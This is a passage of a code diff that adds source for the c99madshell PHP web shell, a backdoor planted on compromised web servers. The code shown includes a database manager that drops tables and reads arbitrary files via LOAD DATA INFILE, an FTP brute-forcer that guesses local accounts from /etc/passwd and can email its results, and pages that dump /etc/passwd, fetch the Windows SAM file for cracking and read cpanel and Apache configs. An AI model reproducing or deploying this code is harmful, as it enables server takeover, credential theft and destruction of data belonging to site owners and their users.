+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a>&nbsp;";
+       echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+
+       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+
+       echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a>&nbsp;&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>�</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght'];
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging'];
+    if ($fqb_logging)
+    {
+     if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile'];
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   //$ow = posix_getpwuid(fileowner($d));
+   //$gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
